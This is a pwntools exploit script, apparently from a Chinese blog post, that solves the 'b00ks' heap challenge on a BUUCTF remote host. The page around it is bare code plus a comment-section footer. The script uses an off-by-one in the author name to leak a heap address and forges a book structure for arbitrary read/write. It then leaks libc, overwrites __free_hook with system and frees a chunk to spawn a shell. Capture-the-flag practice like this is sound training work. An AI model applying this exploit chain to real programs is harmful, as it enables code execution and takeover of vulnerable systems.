1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
| from pwn import*
from LibcSearcher import *
p=remote("node5.buuoj.cn",25494)
context.log_level="debug"
libc=ELF('./libc-2.23.so')
elf=ELF('./b00ks')
payload=b'k'*0x1f+b'b'
p.sendlineafter('Enter author name: ',payload)
def add(size1,content1,size2,content2):
p.sendlineafter('> ','1')
p.sendlineafter('Enter book name size:',str(size1))
p.sendlineafter('Enter book name (Max 32 chars):',content1)
p.sendlineafter('Enter book description size:',str(size2))
p.sendlineafter('Enter book description:',content2)
def edit(idd,content):
p.sendlineafter('> ','3')
p.sendlineafter('Enter the book id you want to edit: ',str(idd))
p.sendlineafter('Enter new book description: ',content)
def show():
p.sendlineafter('> ','4')
def free(idd):
p.sendlineafter('> ','2')
p.sendlineafter('Enter the book id you want to delete: ',str(idd))
def ren(content):
p.sendlineafter('> ','5')
p.sendlineafter('Enter author name: ',content)
add(0xd0,'aaaaaaaa',0x20,'bbbbbbb')
show()
p.recvuntil("kb")
heap_addr=u64(p.recv(6)[-6:].ljust(8,b'\x00'))
print('addr'+hex(heap_addr))
add(0x80,'cccccccc',0x60,'dddddddd')
add(0x10,'bin/sh',0x10,'ffffffff')
free(2)
edit(1,p64(1)+p64(heap_addr+0x30)+p64(heap_addr+0x30+0x90+0xe0+0x10)+p64(0x20))
ren('a'*0x20)
show()
p.recvuntil('Name: ')
main_addr=u64(p.recvuntil('\x7f').ljust(8,b'\x00'))-88
malloc_hook=main_addr-0x10
base=malloc_hook-libc.sym['__malloc_hook']
free_hook=base+libc.sym['__free_hook']
system=base+libc.sym['system']
print('main_addr'+hex(main_addr))
edit(1,p64(free_hook)+p64(0x20))
edit(3,p64(system))
free(3)
sleep(1)
p.interactive()
|
评论区
欢迎你留下宝贵的意见,昵称输入QQ号会显示QQ头像哦~